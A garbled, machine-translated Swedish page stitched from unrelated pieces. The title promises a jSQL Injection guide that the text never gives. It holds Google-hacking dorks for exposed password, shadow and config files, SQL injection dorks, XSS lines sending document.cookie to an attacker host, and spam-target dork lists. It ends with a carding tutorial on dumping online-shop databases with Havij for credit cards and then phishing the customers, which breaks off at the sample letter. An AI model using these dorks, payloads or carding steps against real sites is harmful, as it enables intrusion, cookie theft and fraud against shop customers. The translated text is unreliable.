Instruktioner för att använda jSQL Injection, ett multifunktionellt verktyg för att hitta och utnyttja SQL-injektioner i Kali Linux. Använder föga kända Google-funktioner för att hitta dolda saker Legal inurl index php pics 2


Googles sökmotor (www.google.com) erbjuder många sökalternativ. Alla dessa funktioner är ett ovärderligt sökverktyg för en användare som är ny på Internet och samtidigt ett ännu kraftfullare vapen för invasion och förstörelse i händerna på människor med onda avsikter, inklusive inte bara hackare, utan även icke-datorbrottslingar och även terrorister.
(9475 visningar på 1 vecka)

Denis Barankov
denisNOSPAMixi.ru

Uppmärksamhet: Den här artikeln är inte en vägledning till handling. Den här artikeln skrevs för er, WEB-serveradministratörer, så att ni kommer att förlora den falska känslan av att ni är säker, och ni kommer äntligen att förstå lömskheten i denna metod för att få information och ta upp uppgiften att skydda din webbplats.

Introduktion

Till exempel hittade jag 1670 sidor på 0,14 sekunder!

2. Ange en annan rad, till exempel:

inurl:"auth_user_file.txt"

lite mindre, men detta räcker redan för gratis nedladdning och lösenordsgissning (med samma John The Ripper). Nedan ska jag ge ett antal fler exempel.

Så du måste inse att Googles sökmotor har besökt de flesta av webbplatserna och cachat informationen på dem. Denna cachade information gör att du kan få information om webbplatsen och innehållet på webbplatsen utan att direkt ansluta till webbplatsen, endast genom att fördjupa dig i informationen som lagras inuti Google. Dessutom, om informationen på webbplatsen inte längre är tillgänglig, kan informationen i cachen fortfarande bevaras. Allt du behöver för den här metoden är att känna till några Google-sökord. Denna teknik kallas Google Hacking.

Information om Google Hacking dök upp på Bugtrucks e-postlista för tre år sedan. 2001 togs detta ämne upp av en fransk student. Här är en länk till detta brev http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Den ger de första exemplen på sådana frågor:

1) Index för /admin
2) Index för /lösenord
3) Index av /mail
4) Index över / +banques +filetype:xls (för Frankrike...)
5) Index för / +passwd
6) Index av / password.txt

Det här ämnet skapade vågor i den engelskläsande delen av Internet ganska nyligen: efter artikeln av Johnny Long, publicerad den 7 maj 2004. För en mer komplett studie av Google Hacking råder jag dig att gå till denna författares webbplats http://johnny.ihackstuff.com. I den här artikeln vill jag bara hålla dig uppdaterad.

Vem kan använda detta:
– Journalister, spioner och alla de som gillar att sticka näsan i andras affärer kan använda detta för att söka efter inkriminerande bevis.
- Hackare som letar efter lämpliga mål för hackning.

Hur Google fungerar.

För att fortsätta konversationen, låt mig påminna dig om några av sökorden som används i Google-frågor.

Sök med +-tecknet

Google utesluter ord som den anser vara oviktiga från sökningar. Till exempel frågeord, prepositioner och artiklar på engelska: till exempel are, of, where. På ryska verkar Google betrakta alla ord som viktiga. Om ett ord utesluts från sökningen skriver Google om det. För att Google ska börja söka efter sidor med dessa ord måste du lägga till ett +-tecken utan mellanslag före ordet. Till exempel:

ess +av bas

Sök med tecknet –

Om Google hittar ett stort antal sidor från vilka det behöver utesluta sidor med ett visst ämne, då kan du tvinga Google att endast söka efter sidor som inte innehåller vissa ord. För att göra detta måste du ange dessa ord genom att placera ett tecken framför varje - utan mellanslag före ordet. Till exempel:

fiske - vodka

Sök med ~

Du kanske vill söka efter inte bara det angivna ordet, utan även dess synonymer. För att göra detta, före ordet med ~-symbolen.

Hitta en exakt fras med dubbla citattecken

Google söker på varje sida efter alla förekomster av orden som du skrev i frågesträngen, och den bryr sig inte om ordens relativa position, så länge som alla angivna ord finns på sidan samtidigt (detta är standardåtgärden). För att hitta den exakta frasen måste du sätta den inom citattecken. Till exempel:

"bokstöd"

För att ha minst ett av de angivna orden måste du ange den logiska operationen uttryckligen: ELLER. Till exempel:

boka säkerhet ELLER skydd

Dessutom kan du använda *-tecknet i sökfältet för att ange vilket ord som helst och. att representera vilken karaktär som helst.

Söka efter ord med hjälp av ytterligare operatorer

Det finns sökoperatorer som anges i söksträngen i formatet:

operator:search_term

Mellanslag bredvid kolon behövs inte. Om du infogar ett mellanslag efter kolon kommer du att se ett felmeddelande, och innan det kommer Google att använda dem som en vanlig söksträng.
Det finns grupper av ytterligare sökoperatorer: språk - ange på vilket språk du vill se resultatet, datum - begränsa resultaten för de senaste tre, sex eller 12 månaderna, förekomster - ange var i dokumentet du behöver söka efter raden: överallt, i titeln, i URL:en, domäner - sök på den angivna webbplatsen eller, omvänt, uteslut den från sökningen säker sökning - blockerar webbplatser som innehåller den angivna typen av information och tar bort dem från sökresultatsidorna.
Samtidigt kräver vissa operatörer ingen ytterligare parameter, till exempel kan begäran "cache:www.google.com" anropas som en fullfjädrad söksträng, och vissa nyckelord, tvärtom, kräver en sökning ord, till exempel "site:www google.com hjälp ". I ljuset av vårt ämne, låt oss titta på följande operatörer:

Operatör

Beskrivning

Kräver du en extra parameter?

sök endast på den webbplats som anges i search_term

sök endast i dokument med typen search_term

hitta sidor som innehåller sökterm i titeln

hitta sidor som innehåller alla söktermsord i titeln

hitta sidor som innehåller ordet sökterm i sin adress

hitta sidor som innehåller alla sökterm-ord i sin adress

Operatören site: begränsar sökningen endast till den angivna platsen, och du kan ange inte bara domännamnet utan även IP-adressen. Ange till exempel:

filtypsoperator: Begränsar sökningen till en specifik filtyp. Till exempel:

Från och med publiceringsdatumet för artikeln kan Google söka inom 13 olika filformat:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Länkoperator: Visar alla sidor som pekar på den angivna sidan.
Det är förmodligen alltid intressant att se hur många ställen på Internet som vet om dig. Låt oss försöka:

Cacheoperatör: Visar versionen av webbplatsen i Googles cache som den såg ut senast Google besökte den sidan. Låt oss ta en webbplats som ofta ändras och titta:

intitle-operator: Söker efter ett angivet ord i rubriken på en sida. Operatorn allintitle: är en förlängning - den söker efter alla angivna flera ord i sidrubriken. Jämföra:

intitle:flyg till Mars
intitle:flyg intitle:på intitle:mars
allintitle:flyg till mars

Inurl-operatorn: får Google att visa alla sidor som innehåller den angivna strängen i URL:en. allinurl-operator: söker efter alla ord i en URL. Till exempel:

allinurl:acid acid_stat_alerts.php

Det här kommandot är särskilt användbart för dem som inte har SNORT - de kan åtminstone se hur det fungerar på ett riktigt system.

Hackningsmetoder med Google

Så vi fick reda på att med en kombination av ovanstående operatorer och nyckelord kan vem som helst samla in nödvändig information och söka efter sårbarheter. Dessa tekniker kallas ofta Google Hacking.

Webbplatskarta

Du kan använda operatorn site: för att lista alla länkar som Google har hittat på en webbplats. Sidor som skapas dynamiskt av skript indexeras vanligtvis inte med parametrar, så vissa webbplatser använder ISAPI-filter så att länkarna inte har formen /article.asp?num=10&dst=5 utan med snedstreck /article/abc/num/ 10/dst/5. Detta görs så att webbplatsen i allmänhet indexeras av sökmotorer.

Låt oss försöka:

webbplats: www.whitehouse.gov whitehouse

Google tror att varje sida på en webbplats innehåller ordet whitehouse. Detta är vad vi använder för att få alla sidor.
Det finns också en förenklad version:

webbplats: whitehouse.gov

Och det bästa är att kamraterna från whitehouse.gov inte ens visste att vi tittade på strukturen på deras webbplats och ens tittade på de cachade sidorna som Google laddade ner. Detta kan användas för att studera strukturen på webbplatser och visa innehåll, förbli oupptäckt tills vidare.

Visa en lista över filer i kataloger

WEB-servrar kan visa listor med serverkataloger istället för vanliga HTML-sidor. Detta görs vanligtvis för att säkerställa att användare väljer och laddar ner specifika filer. Men i många fall har administratörer ingen avsikt att visa innehållet i en katalog. Detta inträffar på grund av felaktig serverkonfiguration eller avsaknaden av huvudsidan i katalogen. Som ett resultat har hackaren en chans att hitta något intressant i katalogen och använda det för sina egna syften. För att hitta alla sådana sidor räcker det att notera att de alla innehåller orden: index of. Men eftersom ordindexet för inte bara innehåller sådana sidor, måste vi förfina frågan och ta hänsyn till sökorden på själva sidan, så frågor som:

intitle:index.of överordnad katalog
intitle:index.of namnstorlek

Eftersom de flesta kataloglistor är avsiktliga kan du ha svårt att hitta felplacerade listor första gången. Men du kan åtminstone redan använda listor för att fastställa WEB-serverversionen, som beskrivs nedan.

Skaffa webbserverversionen.

Att känna till WEB-serverversionen är alltid användbart innan man startar någon hackerattack. Återigen, tack vare Google, kan du få denna information utan att ansluta till en server. Om du tittar noga på kataloglistan kan du se att namnet på WEB-servern och dess version visas där.

Apache1.3.29 - ProXad Server på trf296.free.fr Port 80

En erfaren administratör kan ändra denna information, men som regel är det sant. För att få denna information räcker det alltså att skicka en begäran:

intitle:index.of server.at

För att få information om en specifik server förtydligar vi begäran:

intitle:index.of server.at site:ibm.com

Eller vice versa, vi letar efter servrar som kör en specifik version av servern:

intitle:index.of Apache/2.0.40 Server på

Denna teknik kan användas av en hackare för att hitta ett offer. Om han till exempel har en exploit för en viss version av WEB-servern, kan han hitta den och prova den befintliga exploiten.

Du kan också få serverversionen genom att visa sidorna som är installerade som standard när du installerar den senaste versionen av WEB-servern. Till exempel, för att se Apache 1.2.6-testsidan, skriv bara

intitle:Test.sida.för.Apache det.fungerade!

Dessutom installerar och startar vissa operativsystem omedelbart WEB-servern under installationen. Vissa användare är dock inte ens medvetna om detta. Naturligtvis, om du ser att någon inte har tagit bort standardsidan, är det logiskt att anta att datorn inte har genomgått någon anpassning alls och sannolikt är sårbar för attacker.

Försök att söka efter IIS 5.0-sidor

allintitle:Välkommen till Windows 2000 Internet Services

När det gäller IIS kan du bestämma inte bara serverversionen utan även Windows-versionen och Service Pack.

Ett annat sätt att fastställa WEB-serverversionen är att söka efter manualer (hjälpsidor) och exempel som kan installeras på webbplatsen som standard. Hackare har hittat en hel del sätt att använda dessa komponenter för att få privilegierad tillgång till en webbplats. Det är därför du måste ta bort dessa komponenter på produktionsplatsen. För att inte tala om det faktum att närvaron av dessa komponenter kan användas för att få information om typen av server och dess version. Låt oss till exempel hitta apache-manualen:

inurl:manual apache-direktivmoduler

Använder Google som en CGI-skanner.

CGI-skanner eller WEB-skanner är ett verktyg för att söka efter sårbara skript och program på offrets server. Dessa verktyg måste veta vad de ska leta efter, för detta har de en hel lista med sårbara filer, till exempel:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Vi kan hitta var och en av dessa filer med Google och dessutom använda orden index of eller inurl med filnamnet i sökfältet: vi kan hitta webbplatser med sårbara skript, till exempel:

allinurl:/random_banner/index.cgi

Med hjälp av ytterligare kunskap kan en hackare utnyttja ett skripts sårbarhet och använda denna sårbarhet för att tvinga skriptet att skicka ut alla filer som lagras på servern. Till exempel en lösenordsfil.

Hur du skyddar dig från Google-hackning. 1. Lägg inte upp viktiga data på WEB-servern.

Även om du har lagt upp data tillfälligt kan du glömma det eller så kommer någon att hinna hitta och ta denna data innan du raderar den. Gör inte det. Det finns många andra sätt att överföra data som skyddar den från stöld.

2. Kontrollera din webbplats.

Använd metoderna som beskrivs för att undersöka din webbplats. Kontrollera din webbplats med jämna mellanrum efter nya metoder som visas på webbplatsen http://johnny.ihackstuff.com. Kom ihåg att om du vill automatisera dina handlingar måste du få specialtillstånd från Google. Om du läser noga http://www.google.com/terms_of_service.html, då kommer du att se frasen: Du får inte skicka automatiska frågor av något slag till Googles system utan uttryckligt tillstånd i förväg från Google.

3. Du kanske inte behöver Google för att indexera din webbplats eller någon del av den.

Google tillåter dig att ta bort en länk till din webbplats eller en del av den från dess databas, samt ta bort sidor från cachen. Dessutom kan du förbjuda sökning efter bilder på din webbplats, förbjuda att korta fragment av sidor visas i sökresultat. Alla möjligheter att ta bort en webbplats beskrivs på sidan http://www.google.com/remove.html. För att göra detta måste du bekräfta att du verkligen är ägaren till den här webbplatsen eller infoga taggar på sidan eller

4. Använd robots.txt

Det är känt att sökmotorer tittar på filen robots.txt som finns i roten på webbplatsen och inte indexerar de delar som är markerade med ordet Disallow. Du kan använda detta för att förhindra att delar av webbplatsen indexeras. Till exempel, för att förhindra att hela webbplatsen indexeras, skapa en robots.txt-fil som innehåller två rader:

Användaragent: *
Disallow: /

Vad händer mer

För att livet inte ska verka som älskling för dig, ska jag slutligen säga att det finns webbplatser som övervakar de människor som, med hjälp av metoderna som beskrivs ovan, letar efter hål i skript och WEB-servrar. Ett exempel på en sådan sida är

Ansökan.

Lite sött. Prova något av följande själv:

1. #mysql dump filtyp:sql - sök efter mySQL-databasdumpar
2. Sammanfattningsrapport om värdsårbarhet - visar dig vilka sårbarheter andra människor har hittat
3. phpMyAdmin körs på inurl:main.php - detta tvingar kontrollen att stängas genom phpmyadmin-panelen
4. inte för distribution konfidentiellt
5. Begär detaljer Styrträdsservervariabler
6. Körs i barnläge
7. Denna rapport skapades av WebLog
8. intitle:index.of cgiirc.config
9. filtyp:conf inurl:brandvägg -intitle:cvs – kanske någon behöver brandväggskonfigurationsfiler? :)
10. intitle:index.of finances.xls – hmm....
11. intitle:Index för dbconvert.exe-chattar – icq-chattloggar
12.intext:Tobias Oetiker trafikanalys
13. intitle:Användningsstatistik för Genererad av Webalizer
14. intitle:statistik över avancerad webbstatistik
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets har delade hemligheter - hemlig nyckel - bra hitta
17. inurl:main.php Välkommen till phpMyAdmin
18. inurl:server-info Apache-serverinformation
19. site:edu admin betyg
20. ORA-00921: oväntat slut på SQL-kommandot – hämta sökvägar
21. intitle:index.of trillian.ini
22. intitle:Index för pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Index för .mysql_history
27. intitle:index av intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filtyp:ini

  • "Hacking med Google"
  • Utbildningscenter "Informzashita" http://www.itsecurity.ru - ett ledande specialiserat center inom informationssäkerhetsutbildning (licens från Moskvakommittén för utbildning nr 015470, statlig ackreditering nr 004251). Det enda auktoriserade utbildningscentret för Internetsäkerhetssystem och Clearswift i Ryssland och OSS-länderna. Microsoft auktoriserat utbildningscenter (säkerhetsspecialisering). Utbildningsprogrammen samordnas med Rysslands statliga tekniska kommission, FSB (FAPSI). Utbildningsintyg och statliga dokument om avancerad utbildning.

    SoftKey är en unik tjänst för köpare, utvecklare, återförsäljare och affiliate partners. Dessutom är detta en av de bästa onlineprogramvarubutikerna i Ryssland, Ukraina, Kazakstan, som erbjuder kunderna ett brett utbud av produkter, många betalningsmetoder, snabb (ofta omedelbar) orderhantering, spårning av beställningsprocessen i den personliga delen, olika rabatter från butiken och tillverkare BY.

    Jag bestämde mig för att prata lite om informationssäkerhet. Artikeln kommer att vara användbar för nybörjare och de som precis har börjat engagera sig i Frontend-utveckling. Vad är problemet?

    Många nybörjare utvecklare blir så medryckta av att skriva kod att de helt glömmer bort säkerheten i sitt arbete. Och viktigast av allt, de glömmer sådana sårbarheter som SQL och XXS-frågor. De kommer också med enkla lösenord för sina administrativa paneler och utsätts för brute force. Vilka är dessa attacker och hur kan du undvika dem?

    SQL-injektion

    SQL-injektion är den vanligaste typen av attack mot en databas, som utförs under en SQL-fråga för ett specifikt DBMS. Många människor och även stora företag drabbas av sådana attacker. Anledningen är ett utvecklarfel vid skrivning av databasen och strängt taget SQL-frågor.

    En SQL-injektionsattack är möjlig på grund av felaktig bearbetning av indata som används i SQL-frågor. Om en hackares attack lyckas riskerar du att förlora inte bara innehållet i databaserna, utan även lösenord och administrativa panelloggar. Och denna data kommer att vara tillräckligt för att helt ta över webbplatsen eller göra oåterkalleliga justeringar av den.

    Attacken kan framgångsrikt reproduceras i skript skrivna i PHP, ASP, Perl och andra språk. Framgången för sådana attacker beror mer på vilket DBMS som används och hur själva skriptet implementeras. Det finns många sårbara platser för SQL-injektioner i världen. Detta är lätt att verifiera. Ange bara "dorks" - det här är speciella frågor för att söka efter sårbara webbplatser. Här är några av dem:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Hur använder man dem? Ange dem bara i en Google- eller Yandex-sökmotor. Sökmotorn ger dig inte bara en sårbar webbplats, utan också en sida om denna sårbarhet. Men vi kommer inte att stanna där och se till att sidan verkligen är sårbar. För att göra detta räcker det att sätta ett enda citattecken "' efter värdet "id=1". Något som det här:

    • inurl:games.php?id=1'

    Och webbplatsen kommer att ge oss ett felmeddelande om SQL-frågan. Vad behöver vår hacker härnäst?

    Och då behöver han just den här länken till felsidan. Sedan sker arbetet med sårbarheten i de flesta fall i "Kali linux"-distributionen med dess verktyg för denna del: införa injektionskod och utföra nödvändiga operationer. Hur detta kommer att hända kan jag inte berätta för dig. Men du kan hitta information om detta på Internet.

    XSS Attack

    Denna typ av attack utförs på cookies-filer. Användare i sin tur älskar att spara dem. Varför inte? Vad skulle vi göra utan dem? När allt kommer omkring, tack vare cookies, behöver vi inte ange lösenordet för Vk.com eller Mail.ru hundra gånger. Och det är få som vägrar dem. Men på Internet dyker det ofta upp en regel för hackare: bekvämlighetskoefficienten är direkt proportionell mot osäkerhetskoefficienten.

    För att implementera en XSS-attack behöver vår hacker kunskap om JavaScript. Vid första anblicken är språket väldigt enkelt och ofarligt, eftersom det inte har tillgång till datorresurser. En hacker kan bara arbeta med JavaScript i en webbläsare, men det räcker. När allt kommer omkring är det viktigaste att ange koden på webbsidan.

    Jag kommer inte att prata i detalj om attackprocessen. Jag kommer bara att berätta för dig grunderna och innebörden av hur detta händer.

    En hackare kan lägga till JS-kod till något forum eller gästbok:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skripten kommer att omdirigera oss till den infekterade sidan, där koden kommer att exekveras: vare sig det är en sniffer, någon form av lagring eller en exploatering, som på något sätt kommer att stjäla våra cookies från cachen.

    Varför JavaScript? Eftersom JavaScript är bra på att hantera webbförfrågningar och har tillgång till cookies. Men om vårt skript tar oss till någon sida kommer användaren lätt att märka det. Här använder hackaren ett mer listigt alternativ – han anger helt enkelt koden i bilden.

    Img=ny bild();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Vi skapar helt enkelt en bild och tilldelar vårt skript till den som en adress.

    Hur skyddar man sig från allt detta? Det är väldigt enkelt - klicka inte på misstänkta länkar.

    DoS- och DDos-attacker

    DoS (från engelska Denial of Service - denial of service) är en hackerattack mot ett datorsystem med målet att få det att misslyckas. Detta är skapandet av förhållanden under vilka systemanvändare i god tro inte kan komma åt de tillhandahållna systemresurserna (servrarna), eller så är åtkomsten svår. Ett systemfel kan också vara ett steg mot dess övertagande om programvaran i en nödsituation producerar någon kritisk information: till exempel en version, en del av en programkod, etc. Men oftast är detta ett mått på ekonomisk press: förlusten av en enkel tjänst som genererar inkomst. Räkningar från leverantören eller åtgärder för att undvika en attack träffar "målet" i fickan. För närvarande är DoS- och DDoS-attacker de mest populära, eftersom de tillåter nästan alla system att misslyckas utan att lämna juridiskt betydande bevis.

    Vad är skillnaden mellan DoS och DDos attack?

    DoS är en attack designad på ett smart sätt. Till exempel, om servern inte kontrollerar korrektheten av inkommande paket, kan en hackare göra en begäran som kommer att ta evigheter att behandla, och det kommer inte att finnas tillräckligt med processortid för att arbeta med andra anslutningar. Följaktligen kommer kunder att nekas service. Men det kommer inte att vara möjligt att överbelasta eller inaktivera stora välkända sajter på detta sätt. De är beväpnade med ganska breda kanaler och superkraftiga servrar som kan klara av sådan överbelastning utan problem.

    DDoS är faktiskt samma attack som DoS. Men om det finns ett förfrågningspaket i DoS kan det finnas hundratals eller fler av dem i DDoS. Även superkraftiga servrar kanske inte kan hantera en sådan överbelastning. Låt mig ge dig ett exempel.

    En DoS-attack är när du har ett samtal med någon, men då kommer någon ouppfostrad person fram och börjar skrika högt. Det är antingen omöjligt eller väldigt svårt att prata. Lösning: ring säkerhetstjänsten, som lugnar ner sig och tar bort personen från lokalen. DDoS-attacker är när en skara på tusentals sådana ouppfostrade människor rusar in. I det här fallet kommer säkerheten inte att kunna binda alla och ta bort dem.

    DoS och DDoS utförs från datorer, de så kallade zombies. Det här är datorer med användare som hackats av hackare som inte ens misstänker att deras maskin deltar i en attack mot någon server.

    Hur skyddar man sig från detta? I allmänhet, inget sätt. Men du kan göra det svårare för en hackare. För att göra detta måste du välja ett bra webbhotell med kraftfulla servrar.

    Bruteforce attack

    En utvecklare kan komma med många attackskyddssystem, granska skripten vi har skrivit fullständigt, kontrollera webbplatsen för sårbarheter osv. Men när han kommer till det sista steget i webblayouten, nämligen när han helt enkelt ställer in ett lösenord för adminpanelen, kan han glömma en sak. Lösenord!

    Det rekommenderas absolut inte att ställa in ett enkelt lösenord. Detta kan vara 12345, 1114457, vasya111, etc. Det rekommenderas inte att ställa in lösenord som är kortare än 10-11 tecken långa. Annars kan du bli utsatt för den vanligaste och mest okomplicerade attacken - Brute force.

    Brute force är en ordbok lösenordssökning attack med hjälp av speciella program. Ordböcker kan vara olika: latin, uppräkning med siffror, säg upp till ett visst intervall, blandat (latin + siffror), och det finns till och med ordböcker med unika tecken @#4$%&*~~`’”\ ? etc.

    Naturligtvis är denna typ av attack lätt att undvika. Allt du behöver göra är att komma med ett komplext lösenord. Även en captcha kan rädda dig. Dessutom, om din webbplats är gjord på ett CMS, så upptäcker många av dem denna typ av attack och blockerar IP:n. Du måste alltid komma ihåg att ju fler olika tecken i ett lösenord, desto svårare är det att gissa.

    Hur fungerar hackare? I de flesta fall misstänker eller känner de till en del av lösenordet i förväg. Det är ganska logiskt att anta att användarens lösenord definitivt inte kommer att bestå av 3 eller 5 tecken. Sådana lösenord leder till frekvent hackning. I grund och botten tar hackare ett intervall på 5 till 10 tecken och lägger till flera tecken som de kanske känner till i förväg. Därefter genereras lösenord med de nödvändiga intervallen. Kali Linux-distributionen har till och med program för sådana fall. Och voila, attacken kommer inte längre att pågå länge, eftersom volymen på ordboken inte längre är så stor. Dessutom kan en hackare använda grafikkortets kraft. Vissa av dem stöder CUDA-systemet, och sökhastigheten ökar med så mycket som 10 gånger. Och nu ser vi att en attack på ett så enkelt sätt är ganska verklig. Men det är inte bara webbplatser som utsätts för brute force.

    Kära utvecklare, glöm aldrig informationssäkerhetssystemet, för idag lider många människor, inklusive stater, av sådana typer av attacker. Den största sårbarheten är trots allt en person som alltid kan bli distraherad någonstans eller missa något. Vi är programmerare, men inte programmerade maskiner. Var alltid på din vakt, för att förlora information kan få allvarliga konsekvenser!

    Hur man söker korrekt med google.com

    Alla vet förmodligen hur man använder en sökmotor som Google =) Men det är inte alla som vet att om du korrekt komponerar en sökfråga med hjälp av speciella konstruktioner kan du uppnå resultatet av det du letar efter mycket mer effektivt och snabbare =) I den här artikeln Jag ska försöka visa det och vad du behöver göra för att söka rätt

    Google stöder flera avancerade sökoperatorer som har speciell betydelse vid sökning på google.com. Vanligtvis ändrar dessa uttalanden sökningen, eller till och med säger åt Google att göra helt andra typer av sökningar. Till exempel är länken: construct en speciell operatör och begäran länk: www.google.com kommer inte att ge dig en normal sökning, utan hittar istället alla webbsidor som har länkar till google.com.
    alternativa förfrågningstyper

    cache: Om du inkluderar andra ord i en fråga kommer Google att markera de inkluderade orden i det cachade dokumentet.
    Till exempel, cache: www.webbplats kommer att visa det cachade innehållet med ordet "webb" markerat.

    länk: Sökfrågan ovan visar webbsidor som innehåller länkar till den angivna frågan.
    Till exempel: länk: www.webbplats kommer att visa alla sidor som har en länk till http://www.site

    relaterat: Visar webbsidor som är "relaterade" till den angivna webbsidan.
    Till exempel, relaterat: www.google.com kommer att lista webbsidor som liknar Googles startsida.

    info: Begär information: presenterar en del av informationen som Google har om webbsidan du begär.
    Till exempel, info:webbplats kommer att visa information om vårt forum =) (Armada - Adult Webmasters Forum).

    Övriga förfrågningar om information

    define: Define:-frågan ger en definition av orden du anger efter den, samlad från olika onlinekällor. Definitionen kommer att gälla för hela den angivna frasen (det vill säga den kommer att inkludera alla ord i den exakta frågan).

    aktier: Om du startar en fråga med aktier: Google kommer att behandla resten av söktermerna som aktiesymboler och länka till en sida som visar färdig information om dessa symboler.
    Till exempel, aktier: Intel Yahoo kommer att visa information om Intel och Yahoo. (Observera att du ska skriva de senaste nyheternas symboler, inte företagets namn)

    Frågemodifierare

    site: Om du inkluderar site: i din fråga kommer Google att begränsa resultaten till de webbplatser som hittas på den domänen.
    Du kan också söka efter enskilda zoner, som ru, org, com, etc ( site:com site:ru)

    allintitle: Om du kör en fråga med allintitle:, kommer Google att begränsa resultaten till alla frågeord i titeln.
    Till exempel, allintitle: google-sökning kommer att returnera alla Google-sidor genom sökning som bilder, blogg, etc

    intitle: Om du inkluderar intitle: i din fråga kommer Google att begränsa resultaten till dokument som innehåller det ordet i titeln.
    Till exempel, intitle:Business

    allinurl: Om du kör en fråga med allinurl: Google kommer att begränsa resultaten till alla sökord i webbadressen.
    Till exempel, allinurl: google-sökning kommer att returnera dokument med google och söka i rubriken. Som ett alternativ kan du också separera ord med ett snedstreck (/) så kommer ord på båda sidor av snedstrecket att sökas på samma sida: Exempel allinurl: foo/bar

    inurl: Om du inkluderar inurl: i din fråga kommer Google att begränsa resultaten till dokument som innehåller det ordet i webbadressen.
    Till exempel, Animation inurl:site

    intext: söker endast efter det angivna ordet i sidtexten, ignorerar titel- och länktexter och andra saker som inte är relaterade till. Det finns också en derivata av denna modifierare - allintext: d.v.s. vidare kommer alla ord i frågan endast att sökas i texten, vilket också kan vara viktigt, och ignorerar ofta använda ord i länkar
    Till exempel, intext:forum

    daterange: söker inom en tidsram (daterange:2452389-2452389), datum för tider är i julianskt format.

    Tja, och alla möjliga intressanta exempel på frågor

    Exempel på att skriva frågor för Google. För spammare

    Inurl:control.guest?a=sign

    Site:books.dreambook.com “Hemsida URL” “Sign my” inurl:sign

    Webbplats: www.freegb.net Hemsida

    Inurl:sign.asp "Antal tecken"

    "Meddelande:" inurl:sign.cfm "Avsändare:"

    Inurl:register.php “Användarregistrering” “Webbplats”

    Inurl:edu/guestbook "Sign the Guestbook"

    Inurl:post "Lägg in kommentar" "URL"

    Inurl:/archives/ “Kommentarer:” “Kommer du ihåg info?”

    "Manus och gästbok Skapad av:" "URL:" "Kommentarer:"

    Inurl:?action=lägg till "phpBook" "URL"

    Intitle:"Skicka in ny berättelse"

    Tidningar

    Inurl:www.livejournal.com/users/ mode=reply

    Inurl greatestjournal.com/ mode=reply

    Inurl:fastbb.ru/re.pl?

    Inurl:fastbb.ru /re.pl? "Gästbok"

    Bloggar

    Inurl:blogger.com/comment.g?”postID””anonymous”

    Inurl:typepad.com/ "Skriv en kommentar" "Kommer du ihåg personlig information?"

    Inurl:greatestjournal.com/community/ "Lägg in kommentar" "adresser till anonyma affischer"

    "Skriv kommentar" "adresser till anonyma affischer" -

    Intitle:"Skriv kommentar"

    Inurl:pirillo.com “Skriv kommentar”

    Forum

    Inurl:gate.html?”name=Forum” “mode=reply”

    Inurl:”forum/posting.php?mode=reply”

    Inurl:"mes.php?"

    Inurl:”members.html”

    Inurl:forum/memberlist.php?”

    [Prolog]

    Jag tror att var och en av oss försökte skaffa kreditkort på egen hand, jag är inget undantag. Den huvudsakliga metoden är att dumpa databasen för en onlinebutik genom SQL-inj.

    [Parsing]

    Allt börjar med länkanalys. Personligen använde jag min egen parser. Du kan använda allmänt tillgänglig mjukvara. Observera att du inte bara ska använda en sådan

    Inurl:product.php?id=

    behöver något sånt här

    Inurl:"product.php?id=" köp iphone

    eller till och med så

    Inurl:"*shop.com" inurl:".php?id=" klänning

    Citat spelar en stor roll här... Här är några avföringsspår:

    Inurl:buy.php?category= inurl:gallery.php?id=d= inurl:event.php?id= inurl:view_product.php?id= inurl:product.php?id= inurl:products.php?id= inurl:shop.php?id= inurl:collectionitem.php?id= inurl:shopping.php?id= inurl:items.php?id=

    Och nu har vi ett par tusen länkar!

    [Sök efter sql-inj. Dränera DB]

    Det var allt, vi har analyserat våra miljoner länkar. Låt oss börja kontrollen.. Och här använde jag min checker.. Du kan använda allmänt tillgänglig programvara...

    Här är det...

    Vi har samlat in sårbara länkar och börjar tömma dem. Själv snurrar jag först igenom Havij. Om han inte kan, och detta är i 50% av fallen, används hans händer. Och här är den!!! Vi stötte på ett bord med titeln

    Vi öppnar den, och..... och det finns inga kolumner med kreditkort. Hmmm...

    [SS där det inte finns någon]

    Ja, vi hittade inga kolumner med ss, och det här är tråkigt. 99 % av kardarna kommer att ge upp en sådan butik och gå vidare. Det finns ingen anledning att rusa. Vi har alla butiksbeställningar, namn, efternamn, adresser och kunddatum till hands. Låt oss nu komma ihåg vad som brukar hända när vi nyper på ss? Just det, de ber oss om foton på dokument och ett kreditkort....

    [Nu är VI en butik!]

    Töm från bordet

    FName LName beställningsdatum e-post

    Naturligtvis kan namnen vara olika.

    Nu har vi allt vi behöver. Vi registrerar ett mejl som . Nu är vi redo. Låt oss börja spamma...

    Exempeltext på brevet:

